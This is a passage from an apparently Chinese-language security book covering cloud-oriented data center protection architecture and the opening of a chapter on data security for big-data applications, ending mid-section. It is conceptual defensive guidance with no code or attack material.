云化数据中心的演进是一个长期的过程,传统风险与新兴风险并存 数据中心是一个大规模的IT基础设施。受制于业务形态和运行环境要求,并不是将传统数据中心“一刀切”式地摒弃,这也导致传统数据中心向云化数据中心的演进不是一蹴而就的。在这个过程中,传统数据中心、云数据中心混合共存。对于安全体系也是如此,它需要兼容这种混合云数据中心,能有效应对传统风险与新兴风险长期并存的局面。 ● 企业对云数据中心安全建设缺乏全面系统的认识 大部分企业采用传统数据中心安全防护的经验和思路指导云数据中心安全的建设,由于云数据中心与传统数据中心在IT架构、管理运营等方面都存在较大差异,尤其是云数据中心具有多层次的网络纵深、多角色的IT活动、多形态的服务模式等特性,这导致安全防护与现有云业务的运行、运营管理脱节,无法有效支撑云数据中心安全的防护作用。 ● 云数据中心面临更严峻的安全挑战 由于云数据中心是应用、业务、数据、流量的大型集散地,因此越来越多的攻击者将目标指向云数据中心。单点突破、横向扩散等多手段、多阶段的攻击方法成为针对云数据中心的主流攻击行为,极具隐蔽性和动态性。其次,云数据中心新技术的运用,使得针对这些虚拟化、云计算新技术的攻击成为攻击者热衷的突破点。最后,云计算的弹性、动态为业务提供方便的同时,也对安全提出了更高的要求,导致现有静态安全体系无法适应这个变化节奏。 ● 混合云导致云数据中心的安全挑战更趋复杂 企业的云数据中心往往并不局限于自建私有云模式,随着企业业务和云计算服务的发展,采用自建云平台并结合云服务商的公有云或专有云服务形成一个混合云,已经成为大型企业云数据中心的一个重要模式。同时,云数据中心往往还会存在总部云、区域云甚至海外云等多云互联服务的情况。企业内网访问、多云互联、公有云接入、互联网业务访问等业务场景都聚合在混合云环境中,这使得云数据中心的安全防护工作面临更加复杂的挑战。 8.1.3 传统云安全建设问题与误区 ● 过于关注云平台安全而缺乏对云数据中心整体安全的考虑 数据中心的云化使得云平台成为云数据中心的核心,但云平台并不能取代数据中心所承载的所有信息化职能。对于企业用户来说,云是数据中心的一种服务形态,与传统物理服务器一起提供基础环境支撑。但因为企业部门职责、信息化建设以及一些历史原因,当前企业云安全的建设往往只关注云平台及其服务的安全,而忽视了整个云化、混合且紧密结合的数据中心的安全建设,从而衍生了很多数据中心安全漏洞,并进一步威胁到了云平台的安全。 ● 缺乏从整体安全视角构建的数据中心级安全能力 由于缺乏从云数据中心及企业整体安全防护视角开展云安全的规划建设,导致企业构想建设的云安全能力存在缺失和不足。安全建设往往不会覆盖安全滑动标尺的基础架构安全、纵深防御安全、主动防御、威胁情报等领域,缺乏与企业身份、密码、系统安全等企业级安全平台的联动。在云内、云外的网络纵深防御、系统安全支撑、云内外特权访问控制、云流量分层隔离、云资源隔离保护、云内外安全态势感知等方面也存在很大的能力缺失,无法为企业用户提供完善的云安全支撑。 ● 忽视与云运营业务的聚合,云安全与云业务建设割裂 云业务具备极强的运营属性,在面向企业客户提供云基础服务时,安全服务往往需要与云基础服务一起提供。但当前云安全建设往往与信息化建设存在一定的隔裂,安全能力无法有效地与云业务结合,从而导致云安全服务往往游离在云基础服务之外,安全能力的保障效果得不到有效的应用发挥。 ● 缺乏云内外安全态势的联动 作为信息化基础设施,云平台本身可以成为一个完整的生态环境,企业也需要具备构建云内安全态势的能力。但当前云内安全态势的建设或者能力要么存在缺失,要么没有与企业整体的安全态势感知平台联通,从而无法将云安全情况与企业整体安全情况联动,导致安全体系的整体保障效果大打折扣,也降低了云数据中心的服务效能。 因此,在数据中心的云化进程中,企业需要建设既能够兼容传统数据中心安全,又能满足面向云的数据中心安全的防护体系。从工程体系化的视角规划设计安全能力,从实战有效化的目标出发组织建设安全能力,从内生于业务的理念编排融合安全能力。通过阐述设计面向云的数据中心安全体系,为企业提供一个面向复杂业务场景,且具有宏观整体工程化视角,又经得起实战考验的云数据中心安全解决方案。 在这个领域,国外美国军队的一些成功经验值得借鉴。美国国防信息系统局(DISA)积极致力于推动商业云计算在军事领域的应用。美军在将其数据迁移到云上时面临的最大风险是,如何为应用程序提供适当级别的安全服务。为此,国防信息系统局在2017年底创建了一个名为安全云计算体系架构(SCCA)的程序,目的是在为美军使用商用云服务的时候提供一个整体性的保护屏障。作为美军云安全的核心架构,SCCA不仅关注虚拟环境内部隔离等安全,而且将一系列的存储、网络、主机等虚拟基础设施,连同云服务商接入、外部服务网络接入、国防部内部网络接入、身份凭证管理等安全要求都纳入安全框架中。SCCA实际上围绕一个复杂而又结构清晰的云数据中心提供了一整套基础设施服务,使得美军在享用最前沿的商业化云服务的同时,又能保证其核心数据的安全。 8.2 什么是面向云的数据中心安全防护 8.2.1 基本概念 所谓面向云的数据中心安全防护,是指立足于混合云模式,适用于IaaS、PaaS、SaaS云服务类型,结合虚拟化、弹性扩展等云计算技术的特点,采用全面覆盖、深度融合的方式规划设计数据中心级的安全能力,并利用系统工程的方式开展安全建设,从而构建云数据中心的安全防护体系。 数据中心级的安全能力,是指面向云数据中心的云基础设施、云服务交付、云资源访问、云资源运维管理等全层次,提供网络纵深防御、系统安全支撑、云特权访问控制、流量分层隔离、云资源隔离与安全服务串接、安全态势感知等安全能力。 全面覆盖和深度融合,是指全面覆盖数据中心的边界、云边界、应用系统区域、主机、容器等层次,打通控制平面,实现安全防护体系和云环境的一体化编排调度,并与云数据中心的IT建设与运维工作实现聚合内生。 采用系统工程的方式开展建设,是指基于同步规划、同步建设、同步运营,有人员参与的建设原则,从工程建设的角度出发,组织构建必要的、多维度的、与其他系统相互连通的云安全能力,实现有人员参与的云安全能力运营和管理的建设目标;全面覆盖云数据中心的安全需求,深度结合云平台相关业务,紧密围绕以运营为中心的安全活动,从而通过系统工程的方式实现基于实践经验的、面向云的数据中心安全防护体系的构建。 8.2.2 设计思想 ● 软件定义安全 软件定义安全是面向云的数据中心安全防护的基础。面对云计算的弹性、动态的特性,只有通过软件定义安全实现对原有安全能力的改造创新,将安全能力软件化、服务化、资源池化,才能使其真正适应云数据中心的变化。 ● 分层防御、区域自治 与传统数据中心不同,云数据中心是多层次、多角色的。针对云计算IaaS、PaaS、SaaS不同层次的安全需要,设计不同的安全能力进行防护,使得每个层次能够独立进行安全管控和运营。同时整体设计云安全中心,对全局维度的云数据中心安全能力进行统一监控、管理、运营。 ● 聚合业务、全面纳管 将云安全组件结合到云的各信息化层次中,将云安全能力聚合到云数据中心的信息化业务中,实现对云主机、云网络、中间件、数据等云资源的全面安全纳管,确保安全成为云数据中心信息化的一个组成部分,落实安全对云数据中心的全面覆盖和深度融合。 8.2.3 总体架构 面向云的数据中心安全体系,是以云服务交付安全防护和云基础平台安全防护两方面为总体架构展开,基于滑动标尺模型的理念进行能力组织,从基础结构安全、纵深防御、态势感知与主动防御以及威胁情报四层进行的总体结构设计,如图8.1所示。 图8.1 面向云的数据中心安全能力体系 云基础平台防护在云基础设施结构层面将面向云的数据中心分为物理网络层、物理存储层、物理主机层、虚拟化系统层、虚拟化管理层、云管理层;云服务交付防护从云服务分层入手,将基础设施上层的应用服务分为云网络层、虚拟机系统层、应用/中间件层和数据层。通过逐层施加安全防护能力,保障基础平台结构和云服务应用的安全。 基础平台层面从基础设施的运行、访问、认证、生产数据层面进行安全防护,着重立足于基础设施本身展开安全防护。基础设施的运行需要保证其基础软件及操作系统的运行安全及配置的牢固性,同时依据软件、系统供应商的漏洞披露情况及时更新补丁。为保证基础设施的授信访问,基础设施需要全面纳入身份认证管理与访问控制体系,根据统一的密码策略体系,实现对基础设施的安全访问和鉴权管理。由于基础设施承载着重要数据,数据在基础设施中的创建、流转、消费、销毁等每个环节,以及数据泄露、篡改、滥用、非法访问等安全问题,需要进行监控和防护。 纵深防御层面从访问入口、关键路径进行层次化安全防护。针对API、Web、IP等访问入口,施加API防护、Web安全防护、边界防护手段,同时覆盖密码、身份认证等安全体系。纵深防御主要是基于流量侧进行安全防护,除上述安全手段外,还需要针对流量的监控审计、威胁检测、特权操作等进行安全建设,以保障纵深防御从事前监测、事中防护、事后审计,到调查溯源全阶段的安全动作落实到位。 态势感知及主动防御、威胁情报层面主要通过全面的资产探查与资产测绘,实现以资产为防护中心的建设思路。同时,以日志关联分析为基础,以威胁情报大数据为基准,实现对威胁的全面感知。 通过以上能力建设,企业可达成云数据中心预期的安全防护部署架构,如图8.2所示。 典型的企业云数据中心安全防护框架所包含的安全域,可以分为网络安全栈、安全资源池、系统安全服务、云安全接入点、云平台安全防护区和云平台安全管理区。根据业务的需求,云安全接入点可以细分为云数据中心安全接入点、外部安全接入点和公有云安全接入点等。有一些企业还会部署专有云环境,它们也需要与云数据中心通过专有接入点实现安全互访。 面向云的数据中心安全防护建设完毕之后,至少可以覆盖云数据中心边界、云基础平台和云服务交付这三个核心领域的安全需求。其中云数据中心边界可以具体覆盖到数据中心内部接入边界、专有云接入边界、公有云接入边界及外部网络接入边界的安全防护需求。云基础平台领域可以具体覆盖到云平台管理、虚拟化管理、虚拟化及资源、物理机、平台基础网络等层次的安全防护需求。云服务交付可以具体覆盖到云边界、应用系统边界、DMZ、虚拟化主机及容器等层次的安全防护需求。 图8.2 云数据中心安全防护部署架构 8.2.4 关键技术 在面向云的数据中心安全防护建设的过程中,应把握云安全的最新技术方向,采用资源池化技术、SDN服务链编排技术、数据中心特权管控等适合云计算特点的技术手段来支撑云安全能力的实现,而不是拘泥于传统的安全手段。 ● 通过资源池化技术对安全能力进行统一整形 面向云的数据中心安全防护需要各种安全能力,安全能力的寄宿环境、运行形态各有差异。为保证安全能力的可调度性和弹性,需要通过资源池化技术将所有的安全能力进行软件定义,并抽象成可调度的标准安全单位。所有的安全单位不再受制于传统“盒子”的性能束缚,而是可以基于业务需要动态弹性地进行扩展扩容。 ● 借助SDN服务链技术对安全能力进行智能编排 面向云的数据中心安全具有复杂的防护场景,针对不同的安全级别、风险等级、业务运行状态等会形成不同的安全防护动作。通过SDN调度和服务链编排的方式,对独立的安全能力进行场景化编排,快速通过预设的安全场景预案,使得不同类型、不同位置的安全能力按照特定的模式进行组合。 ● 使用微隔离技术加强云数据中心的精细安全管控 主要针对云数据中心东西向流量采取的相对于防火墙、VxLAN来说细粒度更小的网络隔离,能够应对传统环境、虚拟化环境、混合云环境、容器环境下对于东西向流量隔离的需求,阻止攻击者进入企业数据中心网络内部后的横向平移,加强云数据中心内部网络的安全和配置灵活性。 ● 使用PAM(特权访问管理)技术落实特权管控 使用PAM技术加强云数据中心内的特权访问安全:一是特权账号管理,为特权账号凭证提供集中加密的安全存储、自动化管控和安全轮换等;二是特权会话管理,开展特权账号连接会话的授权、监控以及对操作的审计,集中管控人机交互中的特权会话操作行为。 8.2.5 预期成效 ● 防护覆盖能够更加全面,有效满足云数据中心的防护需要 通过开展面向云数据中心的安全防护建设,可以构建全面覆盖云数据中心各类场景需求的云安全能力,能够满足云数据中心的接入边界安全防护,保障云平台自身安全运行,构建云服务交付层的、面向企业用户的安全服务能力,确保云数据中心的开发、运维等特权操作安全,从而实现云数据中心安全防护的全面性。 ● 云安全能力能够深入聚合到云业务中,支撑更加完善的云服务业务 通过开展面向云数据中心的安全防护建设,可以将云安全能力嵌入到云业务流程中。在云资源的产生、更改、注销等环节同步产生和管理安全资源,据此将安全能力变成云运营业务的一部分,在企业开展云服务业务的同时同步交付云安全服务。 ● 云安全能力能够融合到整体安全流程中,实现企业体系化的安全防护 通过开展面向云数据中心的安全防护建设,可以在云上构建安全合规及态势感知能力,并体系化地实现与企业级的态势感知平台、系统安全平台、身份平台、密码平台的互联互通,确保云安全防护不是一个独立、割裂的区域,而是企业整体安全体系的一环,并为数据安全、应用安全等领域提供承载环境和执行点,真正发挥体系化安全防护的效力。 8.3 面向云的数据中心安全防护建设的方法和要点 8.3.1 总体设计流程 企业需要从系统工程的角度开展面向云的数据中心安全防护建设。企业在开展面向云的数据中心安全防护建设的时候,不仅要考虑到云计算本身的多层次、多场景的安全能力要求,而且要考虑到云数据中心安全建设工程与终端安全、网络安全、身份安全、密码安全、安全态势感知等工程的相互关系。需将安全能力合理地分配到云信息化层次中,全面覆盖云数据中心的各个方面,与云IT紧密融合,从而建设形成一个相互协同的安全体系。立足于云数据中心而不是云平台本身的安全,从云服务交付安全防护和云基础平台安全防护两个层面建设数据中心级的安全能力,覆盖云数据中心的基础架构安全、纵深防御、态势感知与主动防御、威胁情报等四个领域的能力,全面满足云数据中心的安全需求,并深度结合云平台的相关业务,为企业提供一个整体的面向复杂应用场景的云数据中心安全解决方案。 为落实相关安全能力,政企机构应按照如下步骤开展面向云数据中心的安全防护建设设计(见图8.3)。 步骤1.云环境识别 先识别云数据中心的IT环境,包括云数据中心的外部边界、云服务交付业务、云运维管理业务、云资源IT业务等内容。 步骤2.云数据中心的对外边界防护设计 基于步骤1的识别结论,围绕云数据中心的对外边界进行接入点设计,基于风险和云业务需求规纳接入点的安全能力。一般包括企业内部接入点、互联网接入点、公有云接入点。 图8.3 面向云的数据中心安全防护总体设计流程 步骤3.内部弹性可扩展的安全能力设计 面向云数据中心的云服务交付业务,在南北向流量防护、系统级安全保障、东西向流量防护层面进行适配云服务交付业务的安全设计。 步骤4.云特权操作管控设计 围绕云基础平台和云服务交付的特权账号管控进行安全管控,降低来自内部的特权操作风险。 步骤5.安全与云IT业务聚合设计 聚焦云安全能力与云IT业务的聚合,体现内生安全的理念。 步骤6.云内外整体安全管控设计 将云安全纳入整体管控,集中开展安全策略、运行状态监控、风险处置等工作。 8.3.2 云环境识别要点 ● 云边界识别 识别云数据中心的接入边界,将其作为云安全边界防护的重要信息输入。一般政企机构的云数据中心边界包括:企业网(骨干网)接入边界、互联网接入边界、公有云接入边界等,部分机构还可能存在专有云接入边界。 ● 云资源识别 识别被保护的云资源的详细属性信息,将其作为云安全能力设计的重要信息输入。具体属性包括虚拟机资产、虚拟网络、中间件、云上应用系统、云基础平台硬件、虚拟化软件及管理组件等。需要识别相关云资源的类别、所属系统、重要程度、部署位置、归口管理等。 ● 云服务交付业务识别 识别政企机构的云服务交付业务是一项重要工作,需明确云服务交付的业务类型是IaaS、PaaS、SaaS的一种或者其组合。针对每一种业务类型,需要明确其内部服务对象、外部服务对象、访问关系、申请及管理方式、权限情况等。尤其是在使用混合云的情况下,要明确其IT责任以确定安全SLA(服务等级协议)要求。 ● 云运维管理业务识别 识别运维管理场景的业务,包括云内运维管理、云平台运维管理。需明确运维管理用户属性、访问方式、权限设定、账号管理的机制等内容。 ● 协同识别 在面向云的数据中心安全防护建设的过程中,应识别企业相关部门的参与,而不仅仅是云安全建设团队的参与。一般企业典型的相关建设方至少应包括企业的安全管理部门、安全运营组、网络及系统管理组、应用系统开发组、应用系统运维组、云平台项目组及IT服务中心。应识别相关对接系统,一般包括身份管理与访问控制平台、安全态势感知平台、系统安全平台、内部威胁感知平台、运维管理系统、云平台管理系统等。 8.3.3 云数据中心的对外边界防护建设要点 建设面向企业内网的云数据中心安全接入点,在安全接入点对进出云数据中心的网络流量进行网络层访问控制、流量监控及威胁检测,实现对云数据中心内部边界的风险收敛及网络安全防护。 建设面向互联网的外部安全接入点,在外部安全接入点对来自互联网的网络流量进行网络层访问控制、流量监控及威胁检测,实现对云数据中心外部边界的风险收敛及网络安全防护。 建设面向公有云的公有云安全接入点,在公有云安全接入点对连接公有云的网络流量进行网络层访问控制、流量监控及威胁检测,实现对公有云专线接入的风险收敛及网络安全防护。 8.3.4 内部弹性可扩展的安全能力建设要点 在云边界建设共享的、资源可编排的网络安全栈,针对进出各应用系统区、专有云区、DMZ区、系统安全服务等流量提供访问控制、WAF防护、内网VPN、应用安全代理、API安全代理、负载均衡、零信任访问控制等安全服务,实现对云服务交付层的边界网络访问控制及应用安全防护。 在云内建设数据中心统一的、资源可编排的系统安全服务,针对各应用系统区、DMZ区、系统安全服务区等系统、容器的安全管理,提供软件更新、补丁分发、安全漏洞扫描、配置核查、防病毒、堡垒机、日志采集等安全服务,实现对云服务交付层的系统级安全管理和安全运行支撑。 建设云安全资源池,针对各应用系统区的内部网络、容器网络提供网络访问控制、应用安全代理、API安全代理、零信任访问控制等安全服务,并作为容纳承载密码、数据安全、应用安全等其他安全组件的资源池。 基于分层自治的原则,协同网络对云基础平台按照存储、计算、管理的物理网络结构进行划分隔离、执行白名单访问控制、收缩硬件管理接口、实施虚拟化系统统一管理,通过平台底层的严格控制来保障云服务交付层的灵活应用。在管理区为云基础平台提供补丁分发、堡垒机、日志采集等安全能力,实现对云基础平台的系统安全管理和安全运行支撑。 8.3.5 云特权操作管控建设要点 建设云特权操作管控系统、平台特权操作管控系统,与统一身份管理平台对接,由统一身份管理平台实现对云平台管理用户、业务管理用户、应用运维管理用户、云数据库管理员等特权账号的管理,并基于ABAC模型开展特权用户操作和零信任访问控制,有效管控和降低资源管控、运行维护等操作的安全风险。 8.3.6 安全与云IT业务聚合建设要点 利用网络安全策略、内网VPN等手段,在云内形成相互隔离的平台管理、业务访问、业务管理、安全管理等流量层,在各流量层之间进行网络层隔离保护和访问控制,减少各流量层的暴露面,确保平台管理、业务访问、业务管理、安全管理等流量层的安全可用。 在云网络建设中,通过区域划分、路由策略、动态引流等方式实现网络安全服务的可串接性。 在申请云计算资源环节,在虚拟网络、Hypervisor、标准镜像、虚拟机/容器等层面通过区域设置、安全资源生成、策略配置、安全代理安装、服务指向配置等手段,完成云资源的安全纳管,实现安全服务串接、结合与覆盖。 企业能够聚合云安全能力的典型IT业务包括云基础平台运维管理、云基础平台网络管理、云资源生命周期管理、云资源运维、云网络管理、应用开发维护管理、应用访问管理、事件管理、持续服务管理等。 8.3.7 云内外整体安全管控建设要点 建设云安全管理中心,为网络安全栈、系统安全服务、云安全资源池、云特权操作管控等提供统一的控制平面,并与云环境控制平面进行集成,支撑对混合云环境下的全局安全策略管控。 将云数据中心的安全数据接入安全态势感知平台,并向其开放控制接口,实现对云数据中心的整体安全监控及处置响应。 在面向云的数据中心安全防护建设的过程中,切实打通和身份管理与访问控制平台、安全态势感知平台、系统安全平台、内部威胁感知平台、运维管理系统、云平台管理系统的接口互联,确保关键的身份数据、资产数据、风险数据得以流转,实现在面向云数据中心的同时又能够协同企业整体安全防护体系的体系化运作。 第9章 面向大数据应用的数据安全防护 9.1 数字化转型与业务发展的新要求 9.1.1 数字化转型面临的数据安全挑战 大数据已成为产业发展的创新要素,不仅在数据科学与技术层面,而且在商业模式、产业格局、生态价值与教育层面,都带来了新理念和新思维。大数据与现有产业深度融合,在人工智能、自动驾驶、金融商业服务、医疗健康管理、科学研究等领域展现出广阔的前景,使得生产更加绿色智能,生活更加便捷高效。大数据已经逐渐成为企业发展的有力引擎,在提升产业竞争力和推动商业模式创新方面发挥着越来越重要的作用。 一些信息技术行业的领先企业也开始向大数据转型。它们在提升对大数据的认知和理解的同时,也要充分意识到大数据安全与大数据应用也是一体之两翼,驱动之双轮,必须从国家网络空间安全战略的高度认真研究与应对当前大数据安全面临的复杂问题。 ● 数据安全保护难度加大 大数据的体量巨大,使其更容易成为网络攻击的显著目标。在数据技术时代,数据成为业务发展的核心动力,也成为黑客的主要攻击目标。对于数据拥有者来讲,数据泄露几乎等同于经济损失。在开放的网络化社会,蕴含着海量数据和潜在价值的大数据更受黑客青睐,近年来也频繁爆发信息系统、邮箱账号、社保信息、银行卡号等数据大量被窃的安全事件。分布式的系统部署、开放的网络环境、复杂的数据应用和众多的用户访问,都使得大数据在保密性、完整性、可用性等方面面临更大的挑战。 ● 个人信息泄露风险加剧 大数据系统中普遍存在大量的个人信息,在发生数据滥用、内部偷窃、网络攻击等安全事件时,个人信息泄露产生的后果将远比一般信息系统严重。另一方面,大数据的优势本来在于从大量数据的分析和利用中产生价值,但在对大数据中的多源数据进行综合分析时,分析人员更容易通过关联关系挖掘出更多的个人信息,这进一步加剧了个人信息泄露的风险。 ● 数据所有者权益难以保障 在大数据应用过程中,数据会被多种角色的用户所接触,会从一个控制者流向另外一个控制者,甚至会在某些应用阶段挖掘产生新的数据。因此,在大数据的共享交换、交易流通的过程中,会出现数据拥有者与管理者不同、数据所有权和使用权分离的情况,即数据会脱离数据所有者的控制而存在,从而引发数据滥用、权属不明确、安全监管责任不清晰等安全风险,严重损害数据所有者的权益。 ● 细粒度访问控制的安全挑战 大数据环境规模大,数据多样,业务连续性高并且用户群巨大,数据资源不是完全由数据所有者控制,目前缺乏有效的方法对大数据所有的数据访问行为进行安全控制,无法同时实现细粒度、可伸缩性、数据机密性的访问控制。 9.1.2 传统的数据安全存在的问题 ● 数据的流动性使安全防护困难 数据正在成为组织中重要的生产资料,并且会在流动、交换的过程中创造新的价值。传统的数据安全防护措施更多针对静态的数据,无法满足流动数据的保护需求。由于数据的流动性这一特点,要求数据无论到达哪里,都必须具有相同等级的风险应对能力,否则将因为短板效应而导致该防护体系失效。 ● 传统的方案面临海量数据的巨大挑战 与传统数据库和文件服务器的数据分类分级不同的是,数据治理面临的第一个问题就是数据是海量的。在数字化时代,数据存储与传统数据库和文件服务系统存储不同的是,企业级大数据在来源、种类、格式、数量和敏感性上差别很大,使用的场景各有特点,安全要求各有不同。面对规模如此庞大的数据,已经很难采用传统的技术手段或人工的方式完成大数据平台的数据分级。 ● 数据种类繁多,传统方案难以开展数据分类分级 在数字化业务环境下,数据来源非常庞杂,数据种类至少包括内部业务系统数据、外部机构数据、互联网数据等,这为数据的分类分级工作带来了巨大挑战。从各种渠道和来源收集上来的数据格式千差万别,如何对这些不同格式的数据进行归一化处理,不仅是数据分类分级工作的基础,也是大数据平台数据共享开放与分析挖掘的前提。 ● 单一安全产品难以满足复杂应用场景下的数据安全要求 传统的数据安全机制通常是围绕着办公环境、小型数据中心开展的,数据资产规模小、种类少、结构单一,强调存储加密、脱敏、审计,数据安全体系不完整,难以满足大数据应用场景下的数据动态安全防护。 ● 缺乏数据的识别与管控,难以开展有效的数据安全管理 企业积累了大量的生产、经营和企业管理数据,这些数据体量大、维度多,而且数据与数据之间的联系有强有弱。传统方案缺乏对敏感数据的识别能力。传统地依靠人工参与并结合自动化技术来识别敏感数据的方式,已经完全无法满足当前在时间和效果方面的需求。因此,只能通过新的大数据分析技术与人工智能手段来达到对海量数据的敏感性识别。 ● 访问控制力度不足,缺乏精细化数据访问控制能力 在大数据场景下,数据从多个渠道大量汇聚,数据类型、用户角色和应用需求更加多样化,多源数据的大量汇聚增加了访问控制策略制定及授权管理的难度,导致过度授权和授权不足现象严重。同时,传统访问控制方案中往往采用基于角色的访问控制,缺乏基于属性的访问控制能力,且针对用户的权限策略相对固定,无法根据主客体的风险情况动态调整访问控制策略,导致无法为用户准确指定其可以访问的数据范围,难以满足最小授权原则。 9.2 什么是面向大数据应用的数据安全防护 9.2.1 基本概念 大数据促使数据生命周期由传统的单链条形态逐渐演变成为复杂的多链条形态,增加了共享、交易等环节,且数据应用场景和参与角色愈加多样化。在复杂的应用环境下,保证国家重要数据、企业机密数据以及用户个人隐私数据等敏感数据不发生外泄,是数据安全的首要需求。 对海量、多源、异构的大数据进行安全管理是一项复杂的系统工程,大数据的采集、传输、存储、使用,都面临诸多安全挑战,包括海量数据收集过程中数据真实性难以得到保证;数据传输过程中被窃取、篡改;数据处理过程中,内部人员违规、越权、恶意操作导致数据泄露;数据开放和共享过程中,数据流转到第三方,数据流出管理边界,难以管控和防范敏感数据被外泄或数据被二次分发。 为了应对上述数据安全威胁,组织需要构建覆盖数据全生命周期、数据全流转过程、数据全处理场景的整体数据安全体系。 9.2.2 设计原则 ● 安全治理,打好基础 大数据具有规模大、数据格式多样、存储分散等特点,这增加了数据安全管控的难度。通过数据安全治理,可奠定数据安全管理基础。 ● 围绕场景,贴合业务 围绕数据应用场景,进行针对性的数据安全风险分析,将数据安全管控措施落实到业务处理流程中。 ● 覆盖周期,满足合规 结合组织业务实际,识别需要遵从的国家、行业数据安全标准,满足数据安全管理的合规要求。 9.2.3 总体架构 面向大数据应用的数据安全能力架构如图9.1所示。 1.数据安全治理 数据安全治理包含数据资产梳理、数据分类分级以及权限策略梳理。在数据安全治理过程中,可以通过数据静态梳理技术、动态梳理技术、数据状况的可视化呈现技术,根据数据资产的数据价值和特征等对核心数据资产进行梳理,再按照数据来源、数据属性、数据重要性、内容敏感级别,对数据资产进行分类分级,根据数据的不同类别与不同级别,对数据的访问权限进行梳理。 图9.1 面向大数据应用的数据安全防护架构图 2.数据安全管理及风险分析 数据安全管理通过数据流转实时监测服务,追踪敏感数据的流转情况,可以对数据泄露事件进行监测与溯源。结合数据分类分级,并通过安全基础设施的安全工具和人工手段,对数据安全进行多种方式的脆弱性评估,对数据安全风险进行分析。根据分析结果,采用数据授权与鉴权、数据加密、数据操作审计、运维和测试数据脱敏等策略,防止在数据全生命周期中出现数据安全事件。 3.数据安全防护 ● 数据采集 为了确保数据采集阶段的安全性,需对采集源和采集设备进行注册登记,并对数据源采集设备进行身份识别和认证,防止采集虚假数据,并通过安全基础设施的密码计算服务,对数据进行签名和验签,防止身份抵赖。 ● 数据传输 为了确保数据传输过程中的安全性,需采用网络传输加密技术、加密传输协议、链路加密等加密技术保障数据在传输过程中的保密性,并采用密码技术或数据校验机制,保证数据在传输过程中的完整性。 ● 数据存储 为了确保数据存储的安全性,可通过不同加密技术来保障存储数据的安全性。加密方式包括硬盘加密、文件加密以及数据库加密。硬盘加密可保证物理环境被入侵的情况下,数据不会泄露。文件加密可保证操作系统级别被入侵的情况下,数据不会泄露。数据库加密可通过多种方式对数据库中的数据进行加密,保证数据库被入侵的情况下,数据不会泄露。 在保证数据的可用性方面,需要对重要数据提供容灾备份机制,在极端情况下保证重要数据不丢失。 ● 数据运营 在数据运营及运维安全方面,可通过对运维及运营人员的操作进行监控及审计,通过限制访问敏感数据、访问途径等方式,保障数据安全。对于运维及运营人员来说,限制其仅可通过虚拟桌面的方式对数据进行访问,并对其操作行为进行监控及安全审计。对于敏感数据的操作,通过脱敏方式,仅提供去标识化的数据,保证敏感数据不被泄露。当运维人员及运营人员需使用特权用户时,应通过特权操作管理规范,进行事前审批、事中监测、事后审计的方式进行管理,以防止发生数据安全事件。 ● 共享开放 数据开放层面的安全主要关注开放数据安全、跨安全域安全以及相关接口访问安全。在数据开放内容方面,数据安全开放技术提供可控的智能数据分析环境,支持数据源全量数据的挖掘,在保障数据不流出各自数据中心的前提下,实现融合分析,再通过访问接口方式,结合细粒度的访问控制,提供分析数据。这样一来,既能提供分析服务,又能保证数据不流出。 对跨安全域的数据交换行为,应通过跨安全域数据交换安全隔离技术来保障安全。 ● 数据使用 在数据使用安全层面,应通过严格的访问控制策略、数据保护技术、行为审计技术以及泄露防护技术等,保障数据的使用安全。在访问控制策略方面,通过统一的用户管理、权限管理服务,对应用访问、数据库访问以及接口访问方式提供认证管理及权限管理服务。对数据操作以及应用服务与接口服务行为进行审计,根据预置规则或语义分析,发现并记录异常数据操作行为、高危操作行为、敏感数据操作行为。 对于敏感数据的使用,应通过脱敏技术进行去标识化处理,保证脱敏后的数据级别满足访问级别。 针对终端使用数据的行为,可通过终端数据泄露防护服务,通过对终端用户行为审计、终端行为审计、应用程序管理、系统安全策略来防止重要数据泄露,保证数据安全。 ● 数据销毁 对于不同级别、不同存储方式的数据,可以通过不同的数据销毁方式对数据进行销毁。 物理销毁方式分为介质消磁技术或介质损毁方式。介质消磁技术是使磁化后的材料磁性减弱或消失,保证数据被安全销毁。介质损毁方式则是采用粉碎、烧毁或化学腐蚀等方式对物理介质进行销毁,保证数据被安全销毁。 对于不能以物理销毁方式的数据,可通过内容销毁方式进行销毁。内容销毁方式可分为内容覆写、密钥删除等方式。通过数据覆写工具,根据目标内容的安全级别,确定覆写次数(覆写1次、3次或7次等),保证内容数据被安全销毁。对加密数据,可通过删除密钥方式,对内容进行销毁处理。 9.2.4 关键技术 ● 数据库风险识别和加固 对数据的载体进行风险核查,识别隐患并迅速进行修补能力的建设。对数据资产所在环境的风险状况进行梳理,并突破传统的核查手段仅对数据库的漏洞进行检查的局限,引入对整体安全状况的核查机制,包括相关安全配置、连接状况、人员变更状况、权限变更状况、代码变更状况等全方面的安全状况评估。建立安全基线,实现安全变化状况的报告与分析。 ● 数据脱敏处理 通过静态脱敏技术,可以有效防止内部对隐私数据的滥用,防止隐私数据在未经脱敏的情况下从生产环境流出。静态数据脱敏既能保护隐私数据,又能满足监管合规要求。同时通过引入数据动态脱敏技术可以有效解决数据在展示层外泄的隐患,还可以避免对业务系统和数据库系统的改造。 ● 数据访问控制 基于最小权限原则对数据的访问权限进行严格化管控。通过账号管理和数据访问控制策略,管理员针对不同的业务情况分配不同的数据使用权限,实现细粒度的认证授权机制,最大程度地降低越权操作的可能,保证数据、用户权限的隔离和管控。 ● 数据操作留痕审计 对所有的数据操作进行全生命周期的日志记录,实现所有数据操作的可追溯、可审计、可定责。同时,针对操作行为的日志记录进行风险分析与识别,严格保障数据安全。 ● 结果申报审核 提供申报审核机制来严格检查流出结果。若数据分析师试图取走分析结果,则需要向系统申报。方案平台采用基于白名单机制的人机审核方式以及基于反隐私隐藏技术的智能深度审核方式,可严格审核得取走的结果是否夹带隐私数据,确保隐私数据不流出。 ● 数据置换 针对结构化数据和文本类型等非结构化数据,使用自然语言处理(NLP)技术自动识别敏感实体,然后使用匿名化、格式保全加密等方法对敏感实体进行处理。针对图像等非结构化数据,使用图像识别和自然语言处理等技术提取并处理图像中的隐私信息,确保隐私信息不会流出组织内部。 ● 数据加密 数据安全防护的最后一道防线是数据加密,密钥管理与密码应用技术是保证数据加密与完整性、安全认证的前提。组织应采用密码技术保证重要数据在传输和存储过程中的保密性,包括但不限于鉴别数据、重要业务数据和重要个人信息等;应采用校验技术或密码技术保证重要数据在存储过程中的完整性,包括但不限于鉴别数据、重要业务数据、重要审计数据、重要配置数据、重要视频数据和重要个人信息等。 9.2.5 预期成效 以数据资产的正常使用为基础,保障数据在各种场景下的安全,促进数据价值的释放。 ● 满足合规要求 围绕数据生命周期,以数据为中心,针对数据生命周期的各阶段,实施相应的数据安全控制措施,满足数据安全相关标准要求。 ● 精细化管控 